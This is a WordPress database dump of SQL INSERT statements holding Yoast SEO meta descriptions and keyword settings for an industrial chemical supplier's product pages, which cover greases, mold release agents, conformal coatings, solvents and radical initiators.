INSERT INTO `wp_postmeta` VALUES (19104, 1216, '_yoast_wpseo_metadesc', 'HELOXY™Modifier 62 is a commercial grade of o-cresyl glycidyl ether. A low viscosity aromatic monoepoxide, its primary use is the viscosity reduction of conventional epoxy resin systems.'); 
INSERT INTO `wp_postmeta` VALUES (19105, 1224, '_yoast_wpseo_metadesc', 'HELOXY™Modifier 68 is a diglycidyl ether of neopentyl glycol and is primarily used as a reactive diluent or viscosity reducing modifier for all classes of epoxy resins.'); 
INSERT INTO `wp_postmeta` VALUES (19106, 1230, '_yoast_wpseo_metadesc', 'HELOXY 71 is an undiluted amber colored, low-viscosity liquid, aliphatic epoxy ester resin that imparts increased flexibility and resistance.'); 
INSERT INTO `wp_postmeta` VALUES (19107, 1270, '_yoast_wpseo_metadesc', 'HELOXY™ Modifier 505 is a low viscosity polyepoxide resin that imparts flexibility, impact resistance and thermal shock resistance when incorporated in a wide variety of epoxy formulations. Applications include: Stress relieved concrete patching and surfacing compounds; Thermal shock resistant potting and dip coating compounds; High impact resistant tooling compounds; High peel strength adhesives.'); 
INSERT INTO `wp_postmeta` VALUES (19108, 862, '_yoast_wpseo_metadesc', 'Whatever special needs your system might have, Krytox LVP (low vapor pressure) high-vacuum grease works—safely, reliably, and cost effectively.'); 
INSERT INTO `wp_postmeta` VALUES (19109, 1113, '_yoast_wpseo_metadesc', 'An American tire manufacturer increases production and saves on costly mold repair by switching to Krytox TM7 Tire Mold lubricant.'); 
INSERT INTO `wp_postmeta` VALUES (19110, 1115, '_yoast_wpseo_metadesc', '“We have been using Krytox XHT-BDX for seven years now. We did a case study, and found out that we gained an additional 40% life between preventative maintenance (PM’s).” – A satisfied Krytox customer'); 
INSERT INTO `wp_postmeta` VALUES (19111, 1117, '_yoast_wpseo_metadesc', 'A North American company improves equipment reliability by switching lubricants. Krytox AUT 2E45 Lube for Life helps improve the equipment and life cycle.'); 
INSERT INTO `wp_postmeta` VALUES (19112, 1525, '_yoast_wpseo_metadesc', 'A Mold release agent provides the critical barrier to the molding surface, Miller-Stephenson offers the most technologically advanced solutions available.'); 
INSERT INTO `wp_postmeta` VALUES (19113, 182, '_yoast_wpseo_metadesc', 'MS-122AV is a high performance PTFE release agent designed for superior mold release durability, reduced application frequency, increased cost effectiveness'); 
INSERT INTO `wp_postmeta` VALUES (19114, 302, '_yoast_wpseo_metadesc', 'MS-122SE is a high performance, high solvency PTFE mold release agent designed for unsurpassed adhesion to mold surfaces and extended durability.'); 
INSERT INTO `wp_postmeta` VALUES (19115, 305, '_yoast_wpseo_metadesc', 'Miller-Stephenson Universal PTFE Release Agent is a mold release agent which offers exceptional release with no transfer in a wipe-on application.'); 
INSERT INTO `wp_postmeta` VALUES (19116, 623, '_yoast_wpseo_metadesc', 'MS-114C, Conformal Coating Stripper is specifically formulated to remove all conformal coating base resins while leaving sensitive electronics alone.'); 
INSERT INTO `wp_postmeta` VALUES (19117, 1152, '_yoast_wpseo_metadesc', 'Epoxy Stripping Agent will soften and strip most organic resins, such as epoxies and polyurethanes and will not attack any metal surfaces or valuable parts.'); 
INSERT INTO `wp_postmeta` VALUES (19118, 1673, '_yoast_wpseo_metadesc', 'This connector lubricant will help protect metal connector surfaces from excessive wear, when subjected to hundreds of mating cycles.'); 
INSERT INTO `wp_postmeta` VALUES (19119, 1677, '_yoast_wpseo_metadesc', 'MS-122AD our most universal,economical and cost-effective dry film PTFE release agent and dry lubricant offers excellent lubricity and thin-flim application'); 
INSERT INTO `wp_postmeta` VALUES (19120, 1679, '_yoast_wpseo_metadesc', 'An excellent dry lubricant for all applications. May be used on all surfaces, especially where there is metal to metal contact. Provides a very uniform coating. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).'); 
INSERT INTO `wp_postmeta` VALUES (19121, 1681, '_yoast_wpseo_metadesc', 'MS-122XD, Higher Performance PTFE Dry-Film Lubricant for all applications. Produces a uniform coating and minimization of mechanical wear and no transfer'); 
INSERT INTO `wp_postmeta` VALUES (19122, 303, '_yoast_wpseo_metadesc', 'MS-143TE was developed as an efficient, economical and universal release agent. This PTFE mold release agents is 100% non-flammable and ideal for molding.'); 
INSERT INTO `wp_postmeta` VALUES (19123, 306, '_yoast_wpseo_metadesc', 'MS-143XD is a versatile dry film mold release agent / lubricant, which utilizes fast drying VOC exempt carrier solvent to enhance throughput and efficiency'); 
INSERT INTO `wp_postmeta` VALUES (19124, 308, '_yoast_wpseo_metadesc', 'Miller-Stephenson\'s high temperature release agent, MS-153, a high lubricity boron nitride product for mold release and dry film applications.'); 
INSERT INTO `wp_postmeta` VALUES (19125, 620, '_yoast_wpseo_metadesc', 'Silicone Conformal Coatings is a transparent, flexible, temperature resistance coating that meets MIL-I-46058C, Type SR, IPC-CC-830B and UL 746E approval.'); 
INSERT INTO `wp_postmeta` VALUES (19126, 622, '_yoast_wpseo_metadesc', 'MS-452N, Varnish Conformal Coating offers excellent moisture, oil, chemical, and fungal resistance with good flexibility.'); 
INSERT INTO `wp_postmeta` VALUES (19127, 732, '_yoast_wpseo_metadesc', 'Silicone Electronic Coating is a transparent, soft, flexible temperature resistant coating which MIL-I-46058C, Type SR, IPC-CC-830B and UL 746E approval.'); 
INSERT INTO `wp_postmeta` VALUES (19128, 733, '_yoast_wpseo_metadesc', 'Miller-Stephenson’s Acrylic Conformal Coating is a non-flammable, tough, fast drying, abrasion resistant coating for all electronic boards and components.'); 
INSERT INTO `wp_postmeta` VALUES (19129, 1668, '_yoast_wpseo_metadesc', 'By combining the superior lubricating qualities of Polyphenyl Ether with the cleaning power of a hydrofluoroether azeotrope, Miller-Stephenson has created Connector Lubricant, a formulation that provides the most advanced total treatment for connectors.'); 
INSERT INTO `wp_postmeta` VALUES (19130, 1670, '_yoast_wpseo_metadesc', 'Same general application as MS-381HC. Contains a lower concentration of 6-ring polyphenyl ether. No ODC (ozone depleting chemicals). Custom packaging available. NSN 6850-01-519-8521 (16 oz Aerosol) and NSN 6850-01-367-8095 (16 oz Aerosol MS-381H UV).'); 
INSERT INTO `wp_postmeta` VALUES (19131, 1713, '_yoast_wpseo_metadesc', '99.8% pure anhydrous isopropyl alcohol that is excellent for removing many types of contaminants from multiple surfaces, like electronics, plastics, elastomers, metal, and wood.'); 
INSERT INTO `wp_postmeta` VALUES (19132, 190, '_yoast_wpseo_metadesc', 'MIL-Spec Urethane Conformal Coating offers superior toughness and abrasion resistance and conforms to MIL-I-46058C Type UR, IPC-CC-830B and is UL 94 V-0'); 
INSERT INTO `wp_postmeta` VALUES (19133, 621, '_yoast_wpseo_metadesc', 'Acrylic Conformal Coatings, MS-475C (MIL-SPEC) offer superior abrasion resistance, excellent dielectric properties and will cover 6.4 sq ft at 2 mil'); 
INSERT INTO `wp_postmeta` VALUES (19134, 637, '_yoast_wpseo_metadesc', 'Miller-Stepheson Acrylic Conformal Coating MIL-SPEC meets military requirements MIL-I-46058C Type AR; Coverage at 91 sq ft per gallon at a 2 mil. thickness.'); 
INSERT INTO `wp_postmeta` VALUES (19135, 734, '_yoast_wpseo_metadesc', 'Miller-Stephenson’s Acrylic Coating is a non-flammable, tough, fast drying, abrasion resistant conformal coating for all electronic boards and components.'); 
INSERT INTO `wp_postmeta` VALUES (19136, 735, '_yoast_wpseo_metadesc', 'Miller-Stephenson’s Urethane Conformal Coatings offer superior toughness and abrasion resistance in 100% non-flammable, low odor aerosol formulation.'); 
INSERT INTO `wp_postmeta` VALUES (19137, 736, '_yoast_wpseo_metadesc', 'Miller-Stephenson’s MS-472C Urethane Coating offers superior toughness and abrasion resistance and excellent protection from humidity and solvents.'); 
INSERT INTO `wp_postmeta` VALUES (19138, 738, '_yoast_wpseo_metadesc', 'Miller-Stephenson’s Polyurethane Conformal Coatings offers toughness. The base resin conforms to MIL-I-46058C Type UR, IPC-CC-830B and is UL 94 V-0 listed.'); 
INSERT INTO `wp_postmeta` VALUES (19139, 1384, '_yoast_wpseo_metadesc', 'Our most aggressive flux remover. An, economical and superior solvent for flux removal and heavy duty solvent. MS-555 & MS-557.'); 
INSERT INTO `wp_postmeta` VALUES (19140, 1695, '_yoast_wpseo_metadesc', 'Our best no-clean flux cleaner. It is nonflammable and suitable for removing no-clean flux well as oil, ionic salts, and particulate matter.'); 
INSERT INTO `wp_postmeta` VALUES (19141, 1836, '_yoast_wpseo_metadesc', 'A cleaning and lubricating agent that restores electrical and mechanical continuity to all types of contacts and switches. Contains a high performance synthetic hydrocarbon oil. Excellent for relays, tuners, encoders, slide wires, rheostats, distribution panels, servomechanisms and switching devices. Safe for most plastics. No ODC (ozone depleting chemicals). For lubricating multi-pin connectors, use MS-381HC Connector Lubricant.'); 
INSERT INTO `wp_postmeta` VALUES (19142, 1690, '_yoast_wpseo_metadesc', 'MS-755L low glow warming flux remover is suitable for removing ionic salts, organics flux, heavy industrial soils, wax and heavy grease.'); 
INSERT INTO `wp_postmeta` VALUES (19143, 1697, '_yoast_wpseo_metadesc', 'A strong, cleaning agent containing a hydrofluoroether azeotrope, ideally suited for removal of rosin, organic flux, oils, grease and waxes. Can also be used for precision and specialty cleaning. When used in bulk form, low surface tension, and constant composition during boiling make this product highly suitable for immersion and vapor degreasing equipment. No ODC (ozone depleting chemicals).'); 
INSERT INTO `wp_postmeta` VALUES (19144, 1705, '_yoast_wpseo_metadesc', 'A nonflammable and economical precision cleaning solvent for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays and switching devices. Removes oils, oxidation and operating erosion dust. Evaporates quickly. Leaves no residue. No ODC (ozone depleting chemicals).'); 
INSERT INTO `wp_postmeta` VALUES (19145, 1706, '_yoast_wpseo_metadesc', 'A precision cleaning agent containing a Hydrofluoroether (HFE). Safe and quickly cleans electronic components and circuits, precision instruments, switches, relays and contacts. Removes oils, oxidation and operating erosion dust. Safe for most plastics including acrylic, polycarbonate, polystyrene and ABS. Safe for most elastomers and metals including zinc and magnesium. Leaves no residue. No ODC (ozone depleting chemicals). NSN 6850-01-519-1819.'); 
INSERT INTO `wp_postmeta` VALUES (19146, 1707, '_yoast_wpseo_metadesc', 'An ultra low global warming precision cleaning solvent that safely and quickly cleans electronic components, circuits, and more.'); 
INSERT INTO `wp_postmeta` VALUES (19147, 1708, '_yoast_wpseo_metadesc', 'This product offers solvency for polar soils, while maintaining excellent compatibility with most plastics and metals. Typical applications include absorption drying, precision and speciality cleaning and rinsing for removing particulates, fingerprints and light soils, from metal, plastic and glass parts. It is an ideal choice for absorption drying where nested parts or complex geometries make water removal difficult or energy intensive.'); 
INSERT INTO `wp_postmeta` VALUES (19148, 1834, '_yoast_wpseo_metadesc', 'MS-752U ultrapure, potent precision cleaning agent used in variety of operations as a final rinse of parts in Aerospace, Military, Electronic, Clean rooms.'); 
INSERT INTO `wp_postmeta` VALUES (19149, 1840, '_yoast_wpseo_metadesc', 'A nonflammable, plastic safe cleaning and lubricating agent that restores electrical and mechanical continuity to all types of contacts and switches. Contains a high performance fluorinated synthetic oil in a hydrofluoroether (HFE) solvent. Excellent for relays, tuners, encoders, slide wires, rheostats, distribution panels, servomechanisms and switching devices. No ODC (ozone depleting chemicals). For lubricating multi-pin connectors, use MS-381HC Connector Lubricant.'); 
INSERT INTO `wp_postmeta` VALUES (19150, 881, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19151, 881, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19152, 881, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19153, 868, '_yoast_wpseo_metadesc', 'Krytox NRT 8900 grease has been formulated for use in cold to ambient conditions, and is recommended as a cost-effective replacement.'); 
INSERT INTO `wp_postmeta` VALUES (19154, 878, '_yoast_wpseo_metadesc', 'Krytox NRT 8904 grease has been formulated for use in cold to ambient conditions, and is recommended as a cost-effective replacement.'); 
INSERT INTO `wp_postmeta` VALUES (19155, 880, '_yoast_wpseo_metadesc', 'Krytox NRT 8906 provide excellent lubrication options for valves, regulators, seals, and pump and motor bearings at a wide range of operating conditions.'); 
INSERT INTO `wp_postmeta` VALUES (19156, 881, '_yoast_wpseo_metadesc', 'Krytox NRT 8908 grease is a special high-pressure oxygen paste with excellent lubrication over a broad temperature range.'); 
INSERT INTO `wp_postmeta` VALUES (19158, 1149, '_yoast_wpseo_metadesc', 'For bonding metals, glass, ceramics, plastics, wood, rubber, fabrics and concrete. MS-907 Two-Part Epoxy Adhesive is a room temperature cure epoxy system.'); 
INSERT INTO `wp_postmeta` VALUES (19159, 1710, '_yoast_wpseo_metadesc', 'A nonflammable, azeotrope of a hydrocarbon fluid with methanol. It offers improved solvency for polar soils, while maintaining excellent compatibility with most plastics, ceramics and metals. It is ideally suited for precision and specialty cleaning and rinsing. Removes particulate matter, light oils, fingerprints and light ionic soils from metal, plastic and glass. It can replace hydrochlorofluorocarbons (HCFCs) in many applications. Unique properties include high density, low viscosity, and low-surface tension for effective particle and soil removal. Ideal for use in vapor degreasing equipment. No ODC (ozone depleting chemicals).'); 
INSERT INTO `wp_postmeta` VALUES (19160, 888, '_yoast_wpseo_metadesc', 'Krytox NRT PLSS is recommended for use in applications requiring an H-1 rated lubricant. It is a great lubricant for reactive applications.'); 
INSERT INTO `wp_postmeta` VALUES (19161, 1135, '_yoast_wpseo_metadesc', 'Opteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications.'); 
INSERT INTO `wp_postmeta` VALUES (19162, 1338, '_yoast_wpseo_metadesc', 'A high quality Plastic, Glass & Metal Cleaner especially suitable for non-streak cleaning o including Plexiglas®. MS-260 is a non-streak cleaner.'); 
INSERT INTO `wp_postmeta` VALUES (19163, 1711, '_yoast_wpseo_metadesc', 'A superior solvent cleaner designed to remove all grades of fluorinated lubricants. This cleaner is for applications where the PFPE Lubricant must be completely removed from the surface. It is safe for most plastics, metals, and elastomers.'); 
INSERT INTO `wp_postmeta` VALUES (19164, 1729, '_yoast_wpseo_metadesc', 'The penetrating oil is fast-acting to free rusted nuts and bolts, hinges, locks, pipe threads, chains, clamps and latches. Contains no silicones.'); 
INSERT INTO `wp_postmeta` VALUES (19165, 888, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19166, 888, '_yoast_wpseo_focuskw_text_input', 'Krytox NRT PLSS'); 
INSERT INTO `wp_postmeta` VALUES (19167, 888, '_yoast_wpseo_focuskw', 'Krytox NRT PLSS'); 
INSERT INTO `wp_postmeta` VALUES (19168, 888, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19169, 888, '_yoast_wpseo_focuskeywords', '[{"keyword":"Krytox NRT PLSS","score":"bad"}]'); 
INSERT INTO `wp_postmeta` VALUES (19170, 1711, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19171, 1711, '_yoast_wpseo_focuskw_text_input', 'SolvSys PFPE Re-Move™ MS 250/252'); 
INSERT INTO `wp_postmeta` VALUES (19172, 1711, '_yoast_wpseo_focuskw', 'SolvSys PFPE Re-Move™ MS 250/252'); 
INSERT INTO `wp_postmeta` VALUES (19173, 1711, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19174, 1711, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19175, 1719, '_yoast_wpseo_metadesc', 'For hot-cold intermittence testing of electronic components and protection of components during soldering. Excellent for cooling epoxy in composite forming.'); 
INSERT INTO `wp_postmeta` VALUES (19176, 1726, '_yoast_wpseo_metadesc', 'Same general application as MS-242N but with an antistatic agent. Helps dissipate any static charges which may build up during spray. Instantly freezes small areas to -40°F/-40°C. Compatible with most plastics, rubbers and metals. Nonflammable. No ODC (ozone depleting chemicals).'); 
INSERT INTO `wp_postmeta` VALUES (19177, 1072, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19178, 1072, '_yoast_wpseo_focuskw_text_input', 'Krytox AGL'); 
INSERT INTO `wp_postmeta` VALUES (19179, 1072, '_yoast_wpseo_focuskw', 'Krytox AGL'); 
INSERT INTO `wp_postmeta` VALUES (19180, 1072, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19181, 1072, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19182, 290, '_yoast_wpseo_metadesc', 'ReleaSys 8800 is a high performance water-based, semi-permanent composite mold release agent developed for the most difficult molding operations.'); 
INSERT INTO `wp_postmeta` VALUES (19183, 293, '_yoast_wpseo_metadesc', 'ReleaSys 8500 is a highly versatile water-based, semi-permanent rubber molding release agent designed for superior durability and minimal slip-stick.'); 
INSERT INTO `wp_postmeta` VALUES (19184, 297, '_yoast_wpseo_metadesc', 'ReleaSys 8200 is an aerosol, PTFE Water-based Release Agents a Dry Film designed to provide exceptional release across a broad range of substrates.'); 
INSERT INTO `wp_postmeta` VALUES (19185, 310, '_yoast_wpseo_metadesc', 'ReleaSys 8900 Urethane mold release agent is a low odor, nonflammable agent specialized to excel at releasing composites and urethanes.'); 
INSERT INTO `wp_postmeta` VALUES (19186, 400, '_yoast_wpseo_metadesc', 'ReleaSys 82 is an aerosol, water-based PTFE release agent that forms a dry film, designed to provide exceptional release across a broad range of substrates.'); 
INSERT INTO `wp_postmeta` VALUES (19187, 419, '_yoast_wpseo_metadesc', 'ReleaSys 85 is water-based, semi-permanent rubber mold release agents designed to for superior durability and minimal slip-sticK Elastomer release agent'); 
INSERT INTO `wp_postmeta` VALUES (19188, 423, '_yoast_wpseo_metadesc', 'ReleaSys 88 is a semi-permanent, high performance water-based mold release agent developed to yield unmatched utility, durability and surface slip.'); 
INSERT INTO `wp_postmeta` VALUES (19189, 425, '_yoast_wpseo_metadesc', 'Semi-permanent release agents, ReleaSys 89 is an aerosolized, low odor, nonflammable mold release agent designed for composite, elastomer, plastic molding'); 
INSERT INTO `wp_postmeta` VALUES (19190, 455, '_yoast_wpseo_metadesc', 'Miller-Stephenson’s exclusive mold release agent, ReleaSys Release Agent is backed by more than 40 years of research and development experience.'); 
INSERT INTO `wp_postmeta` VALUES (19191, 1724, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19192, 1724, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19193, 1724, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19194, 1724, '_yoast_wpseo_metadesc', 'En-Rust™ is an aerosol product designed for convenient use in many industrial applications. It contains a high performance rust and corrosion inhibitor. Low GWP (low global warming potential). VOC exempt.'); 
INSERT INTO `wp_postmeta` VALUES (19195, 467, '_yoast_wpseo_metadesc', 'ShieldSys is a family of PFPE (perfluoropolyether) based polymer additives designed for the needs of the medical industry. Our specialized chemistry facilitate migration of the PFPE to the exterior surfaces of the molded product, providing substantial reduction marring, abrasion, tackiness while increasing processibility and final product throughput.'); 
INSERT INTO `wp_postmeta` VALUES (19196, 473, '_yoast_wpseo_metadesc', 'Miller-Stephenson’s SolvSys product line are ultra high purity solvents specifically designed for precise cleaning of today’s sensitive medical devices. SolvSys can be used in the most critical cleaning application such as medical oxygen service parts, where lesser solvent may leave behind residues that will hinder its operation. Our specialty solvent exhibit high cleaning coefficients (KB value), low surface tension, high surface wetting values; critical attributes for cleaning solvents.'); 
INSERT INTO `wp_postmeta` VALUES (19197, 1287, '_yoast_wpseo_metadesc', 'Opteon™ Sion is a safe, nonflammable specialty fluid designed to meet the high solvency needs in the industrial cleaning market.'); 
INSERT INTO `wp_postmeta` VALUES (19198, 1722, '_yoast_wpseo_metadesc', 'A nonflammable nickel conductive coatings that shields RFI / EMI emissions over a broad range of frequencies Coating is dry and functional within minutes.'); 
INSERT INTO `wp_postmeta` VALUES (19199, 1871, '_yoast_wpseo_metadesc', 'Miller-Stephenson offers a broad range of specialty products to help provides our customers with the solutions they require. Freeze agents for hot/cold intermittence testing of electronic components or reducing tack in prepreg composities. Environmentally-Friendly and Non-flammable Dusters to remove microscopic dust and debris. These are are a few examples of the extensive portfolio of solutions we offer to meet your needs.'); 
INSERT INTO `wp_postmeta` VALUES (19200, 122, '_yoast_wpseo_metadesc', 'Since 1955, providing top level tech support for the Chemical Industry.'); 
INSERT INTO `wp_postmeta` VALUES (19201, 1097, '_yoast_wpseo_metadesc', 'Heavy Equipment Grease with Teflon® fluoropolymer is formulated to meet the extreme conditions encountered on heavy equipment.'); 
INSERT INTO `wp_postmeta` VALUES (19202, 1102, '_yoast_wpseo_metadesc', 'DuPont® High Temp Grease with Teflon® fluoropolymer is a lithium complex, semi synthetic grease. Created to withstand extreme pressure and high speeds.'); 
INSERT INTO `wp_postmeta` VALUES (19203, 1104, '_yoast_wpseo_metadesc', 'Teflon Severe Service Grease is an industrial grade grease formulated for maximum water repellency and boundary lubrication protection.'); 
INSERT INTO `wp_postmeta` VALUES (19204, 1106, '_yoast_wpseo_metadesc', 'DuPont® White Lithium Grease with Teflon® fluoropolymer is formulated with a special additive package which insures high film strength.'); 
INSERT INTO `wp_postmeta` VALUES (19205, 1344, '_yoast_wpseo_metadesc', 'Opteon™ Suprion carrier fluid is appropriate to replace PFCs, PFPEs, HFEs, HFCs, and HCFCs in carrier fluid applications.'); 
INSERT INTO `wp_postmeta` VALUES (19206, 1712, '_yoast_wpseo_metadesc', 'A strong cleaning agent designated to clean surfaces prior to applying lubricants, coating and adhesives. It removes difficult soils such as heavy oil, grease, wax, and other contaminates.'); 
INSERT INTO `wp_postmeta` VALUES (19207, 1801, '_yoast_wpseo_metadesc', 'Teflon Multi-Use is a light semi-dry lubricant features a calcium sulfonate thickener and Teflon fluoropolymer for enhanced wear and corrosion protection.'); 
INSERT INTO `wp_postmeta` VALUES (19208, 1819, '_yoast_wpseo_metadesc', 'Teflon Silicone Lubricant with Teflon® Fluoropolymer is excellent for non-metal materials that may be damaged by conventional lubricants.'); 
INSERT INTO `wp_postmeta` VALUES (19209, 1852, '_yoast_wpseo_metadesc', 'An easy, reusable attachment to convert Miller-Stephenson products into an efficient spray system. Features full grip trigger with leverage action for effortless spraying.'); 
INSERT INTO `wp_postmeta` VALUES (19210, 1077, '_yoast_wpseo_metadesc', 'Krytox TM7 grease is specifically designed for the lubrication of segmented molds, both electrically and steam-heated, in the vulcanization process of rubber tire manufacturing. This lubricant eliminates carbon residue buildup on the molds associated with hydrocarbon and hydrocarbon-based synthetic greases. They exhibit excellent adhesion, allowing the operator to significantly increase production by extending lubrication intervals. The TM7 will last in excess of 5000 cycles, based on average curing times, without re-lubrication.'); 
INSERT INTO `wp_postmeta` VALUES (19211, 1637, '_yoast_wpseo_metadesc', 'These general purpose oils gives exceptionally long life, rust and corrosion protection for a variety of applications including circulating systems.'); 
INSERT INTO `wp_postmeta` VALUES (19212, 1638, '_yoast_wpseo_metadesc', 'Powerful penetrating chain oils for applications where the lubricant penetrates to reach the pins and bushings located within roller chains.'); 
INSERT INTO `wp_postmeta` VALUES (19213, 1643, '_yoast_wpseo_metadesc', 'These gear box lubricants deliver maximum protection against friction, wear and heavy shock loads. Miller-Stephenson offers the widest variety of lubricants'); 
INSERT INTO `wp_postmeta` VALUES (19214, 1644, '_yoast_wpseo_metadesc', 'These compressor lubricant substantially, and consistently, reduce friction. Field studies show 5% to 15% savings in electrical consumption.'); 
INSERT INTO `wp_postmeta` VALUES (19215, 1645, '_yoast_wpseo_metadesc', 'These synthetically blended hydraulic oils provide maximum anti-wear protection for high pressure, high performance systems.'); 
INSERT INTO `wp_postmeta` VALUES (19216, 1662, '_yoast_wpseo_metadesc', 'TriboSys Thin Film Lube contains Krytox GPL oils, which are packaged into convenient eight or fourteen ounce aerosols. This packaging provides an easy solution for lubricating hard to reach places with pinpoint accuracy. The low surface tension of the solvent carries the oil into tight crevices. Also available with Krytox grease.'); 
INSERT INTO `wp_postmeta` VALUES (19217, 1664, '_yoast_wpseo_metadesc', 'TriboSys Thin Film Lube contains Krytox GPL oils. This product deposits a low surface solvent that enables the oil to travel into tight crevices. It is ideally suited for trolley system chain pins and wheels, conveyor belt chains, threads, and bolts.'); 
INSERT INTO `wp_postmeta` VALUES (19218, 1666, '_yoast_wpseo_metadesc', 'TriboSys Thin Film Lube contains Krytox GPL greases (PFPE oil thickened with PTFE), which are packaged into convenient eight or fourteen ounce aerosols. This packaging provides an easy solution for lubricating hard to reach places with pinpoint accuracy. The low surface tension of the solvent carries the grease into tight crevices. Also available with Krytox oils.'); 
INSERT INTO `wp_postmeta` VALUES (19219, 427, '_yoast_wpseo_metadesc', 'Vazo 64 radical initiator, also known as AIBN (Azobisisobutyronitrile), is a polymerization initiator that is more cost-effective, efficient than peroxides.'); 
INSERT INTO `wp_postmeta` VALUES (19220, 468, '_yoast_wpseo_metadesc', 'TriboSys™ Fluorinated Synthetic Biocompatible Lubricants ISO 10993 are specially designed to lubricate medical devices. They are also nonflammable.'); 
INSERT INTO `wp_postmeta` VALUES (19221, 568, '_yoast_wpseo_metadesc', 'Vazo 52 , known as 2-2′-Azobis(2,4-dimethylvaleronitrile) is an azo free radical initiator used in polymerization, Vazo 52 has a low initiation temperature.'); 
INSERT INTO `wp_postmeta` VALUES (19222, 989, '_yoast_wpseo_metadesc', 'Superior to Teflon Tape, Krytox TS4 Thread Sealant can be re-applied over itself and offers unmatched corrosion and chemical resistance.'); 
INSERT INTO `wp_postmeta` VALUES (19223, 1100, '_yoast_wpseo_metadesc', 'TriboSys 2200 is a multi-purpos food grade silicone aerosol, NSF Registered spray lubricant for all industries. It is safe around incidental food contact.'); 
INSERT INTO `wp_postmeta` VALUES (19224, 1646, '_yoast_wpseo_metadesc', 'These roller chain oils are used in applications where the lubricant penetrates to reach the pins and bushings located within the roller chain.'); 
INSERT INTO `wp_postmeta` VALUES (19225, 1647, '_yoast_wpseo_metadesc', 'This family of synthetically blended greases are formulated for a wide range of applications and for extremes of speed, temperature and pressure.'); 
INSERT INTO `wp_postmeta` VALUES (19226, 1648, '_yoast_wpseo_metadesc', 'These high temperature greases are formulated to provide continuing lubrication long after conventional lubricants have failed.'); 
INSERT INTO `wp_postmeta` VALUES (19227, 1649, '_yoast_wpseo_metadesc', 'These Food Grade Greases are tasteless, odorless, nontoxic lubricants meet the demanding operating conditions of modern Food and Pharmaceutical facilities.'); 
INSERT INTO `wp_postmeta` VALUES (19228, 575, '_yoast_wpseo_metadesc', 'Vazo 67 radical initiator known as AMBN 2,2’-Azodi(2-methylbutyronitrile) a free radical initiator used as a polymerization initiator with good solubility.'); 
INSERT INTO `wp_postmeta` VALUES (19229, 577, '_yoast_wpseo_metadesc', 'Vazo 88 radical initiator known as ACHN (1,1’-Azobis(cyanocyclohexane)), is an azo radical initiator used as a polymerization initiator in high temperature'); 
INSERT INTO `wp_postmeta` VALUES (19230, 943, '_yoast_wpseo_metadesc', 'Krytox VPF 1506 vacuum pump fluids are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems.'); 
INSERT INTO `wp_postmeta` VALUES (19231, 944, '_yoast_wpseo_metadesc', 'Krytox VPF 1514 vacuum pump fluids are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems.'); 
INSERT INTO `wp_postmeta` VALUES (19232, 954, '_yoast_wpseo_metadesc', 'Krytox VPF 1525 vacuum pump fluids are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems.'); 
INSERT INTO `wp_postmeta` VALUES (19233, 1263, '_yoast_wpseo_metadesc', 'Vapor degreasing should be used for optimum cleaning effectiveness and economy. Vertrel MCA is the perfect precision cleaning fluid for effective cleaning.'); 
INSERT INTO `wp_postmeta` VALUES (19234, 1268, '_yoast_wpseo_metadesc', 'Vertrel SDG has excellent solvency power for a wide range of soils including oils, greases, waxes and hydraulic fluids. Sold by Miller-Stephenson.'); 
INSERT INTO `wp_postmeta` VALUES (19235, 1276, '_yoast_wpseo_metadesc', 'Vertrel SFR is designed to remove difficult to remove high temperature fluxes used in lead free and no clean solders. Excellent solvency.'); 
INSERT INTO `wp_postmeta` VALUES (19236, 1278, '_yoast_wpseo_metadesc', 'Vertrel XF is a very mild, nonflammable solvent. Excellent compatibility with most plastics. It has zero ozone depletion potential and low global warming.'); 
INSERT INTO `wp_postmeta` VALUES (19237, 1601, '_yoast_wpseo_metadesc', 'Vazo free radical initiator is a product line of diazo-compounds designed as radical initiators for a variety of polymerizations and halogenations.'); 
INSERT INTO `wp_postmeta` VALUES (19238, 672, '_yoast_wpseo_metadesc', 'Krytox XHT AC greases are special high temperature greases with low oil evaporation that provide anti-wear and rusting protection.'); 
INSERT INTO `wp_postmeta` VALUES (19239, 674, '_yoast_wpseo_metadesc', 'Krytox XHT-ACX greases are special high temperature greases with low oil evaporation that provide anti-wear and rusting protection.'); 
INSERT INTO `wp_postmeta` VALUES (19240, 675, '_yoast_wpseo_metadesc', 'Krytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting.'); 
INSERT INTO `wp_postmeta` VALUES (19241, 696, '_yoast_wpseo_metadesc', 'Krytox XHT-BDZ greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting.'); 
INSERT INTO `wp_postmeta` VALUES (19242, 697, '_yoast_wpseo_metadesc', 'Krytox XHT-BDX greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting.'); 
INSERT INTO `wp_postmeta` VALUES (19243, 707, '_yoast_wpseo_metadesc', 'Krytox XHT oils allow extended lubrication intervals and longer equipment life. The oil can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Relubrication could be required at these temperatures to achieve optimum life.'); 
